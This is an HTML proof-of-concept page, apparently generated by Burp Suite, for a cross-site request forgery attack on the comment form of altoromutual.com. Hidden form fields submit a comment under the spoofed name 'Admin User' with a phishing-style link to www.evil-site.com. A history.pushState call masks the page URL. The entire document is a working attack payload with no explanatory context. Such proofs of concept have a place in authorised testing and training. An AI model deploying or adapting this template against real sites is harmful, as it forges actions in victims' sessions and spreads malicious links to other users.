<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body>

1. <html>
2. <!-- CSRF PoC - generated by Burp Suite Professional -->
3. <body>
4. <script>history.pushState('', '', '/')</script>
5. <form action="http://altoromutual.com/comment.aspx" method="POST">
6. <input type="hidden" name="cfile" value="comments&#46;txt" />
7. <input type="hidden" name="name" value="Admin&#32;User" />
8. <input type="hidden" name="email&#95;addr" value="email&#64;email&#46;email" />
9. <input type="hidden" name="subject" value="subj" />
10. <input type="hidden" name="comments" value="Who shared this link in todays meeting: www.evil-site.com ???" />
11. <input type="hidden" name="submit" value="&#32;Submit&#32;" />
12. <input type="submit" value="Submit request" />
13. </form>
14. </body>
15. </html>